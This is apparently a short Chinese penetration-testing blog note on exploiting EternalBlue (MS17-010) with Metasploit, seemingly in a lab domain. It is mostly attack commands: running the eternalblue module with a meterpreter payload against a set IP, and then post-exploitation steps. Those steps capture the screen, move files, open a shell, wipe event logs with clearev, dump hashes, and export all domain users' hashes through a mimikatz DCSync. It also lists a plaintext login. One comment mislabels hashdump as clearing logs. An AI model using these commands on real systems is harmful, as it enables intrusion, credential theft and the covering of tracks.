永恒之蓝 永恒之蓝的打法msf17010 12345proxychains4 msfconsoleuse exploit/windows/smb/ms17_010_eternalblue # 选择使用的模块set payload windows/x64/meterpreter/bind_tcp_uuid # 设置payload,可以通过show payloads查看set RHOSTS 172.22.1.21 # 设置靶机的ipexploit # 发起攻击 攻击成功之后 123456meterpreter > screenshot # 捕获屏幕meterpreter > upload hello.txt c:// #上传文件meterpreter > download d://1.txt # 下载文件meterpreter > shell # 获取cmdmeterpreter > clearev # 清除日志meterpreter > hashdump # 清除日志 12load kiwi # 调用mimikatz模块kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit # 导出域内所有用户的信息(包括哈希值) 方程式工具直接注入dll,然后rdp登录 1admin01/Config123!@# 渗透 #渗透 永恒之蓝 http://fearless-123.github.io/2025/09/24/渗透/永恒之蓝/ 作者 fearless123 发布于 2025年9月24日 许可协议 Kerberos认证 上一篇 redis未授权访问 下一篇